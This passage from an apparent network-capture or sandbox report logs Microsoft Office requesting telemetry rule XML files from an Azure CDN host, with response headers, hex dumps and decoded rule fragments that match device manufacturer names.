                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                          ETag: "0x8DC582BA80D96A1"
                                                          x-ms-request-id: 663f4ef8-b01e-0053-4c19-44cdf8000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022744Z-174f7845968frfdmhC1EWRxxbw000000159000000000h5xv
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:44 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.44978213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:44 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:44 UTC515INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 2160
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                          ETag: "0x8DC582BA3B95D81"
                                                          x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022744Z-174f7845968frfdmhC1EWRxxbw00000015bg000000009m7d
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          X-Cache-Info: L1_T2
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:44 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.44978513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:46 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:46 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                          ETag: "0x8DC582B9F6F3512"
                                                          x-ms-request-id: 896d1f20-701e-0001-29ee-44b110000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022746Z-174f7845968frfdmhC1EWRxxbw000000158000000000ndb0
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:46 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          32192.168.2.44978813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:46 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:47 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 467
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                          ETag: "0x8DC582BA6C038BC"
                                                          x-ms-request-id: c220f382-901e-0029-3552-43274a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022746Z-174f7845968n2hr8hC1EWR9cag00000014ug00000000qf6x
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:47 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.44978713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:46 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:47 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 632
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                          ETag: "0x8DC582BB6E3779E"
                                                          x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022746Z-174f78459685726chC1EWRsnbg000000159g00000000hce9
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:47 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          34192.168.2.44978613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:46 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:47 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 471
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                          ETag: "0x8DC582BB10C598B"
                                                          x-ms-request-id: 3deb74dd-c01e-00a1-07f7-447e4a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022746Z-174f7845968zgtf6hC1EWRqd8s0000000ybg0000000012bx
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          35192.168.2.44978413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:46 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:47 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:46 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 474
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                          ETag: "0x8DC582B9964B277"
                                                          x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022746Z-174f78459685m244hC1EWRgp2c000000156g000000004y2d
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          36192.168.2.44979313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:48 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:49 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:48 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 407
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                          ETag: "0x8DC582B9698189B"
                                                          x-ms-request-id: 9f28f116-c01e-008d-51c7-432eec000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022748Z-174f7845968frfdmhC1EWRxxbw00000015eg000000001f85
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:49 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          37192.168.2.44978913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:48 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:49 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:48 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 407
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                          ETag: "0x8DC582BBAD04B7B"
                                                          x-ms-request-id: bef9f1b5-c01e-007a-611b-41b877000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022748Z-174f7845968ljs8phC1EWRe6en000000157g000000002x09
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:49 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          38192.168.2.44979113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:48 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:49 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:48 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 427
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                          ETag: "0x8DC582BA310DA18"
                                                          x-ms-request-id: 7b1224ad-601e-0097-014f-44f33a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022748Z-174f78459684bddphC1EWRbht400000014x000000000seg0
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:49 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          39192.168.2.44979013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:48 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:49 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:49 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 486
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                          ETag: "0x8DC582BB344914B"
                                                          x-ms-request-id: 79414491-c01e-0014-1360-43a6a3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022749Z-174f7845968zgtf6hC1EWRqd8s0000000y8g00000000ahbd
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:49 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          40192.168.2.44979213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:48 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:49 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:49 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 486
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                          ETag: "0x8DC582B9018290B"
                                                          x-ms-request-id: 1383167b-401e-008c-1f3c-4486c2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022749Z-174f7845968ljs8phC1EWRe6en0000001580000000001vqs
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
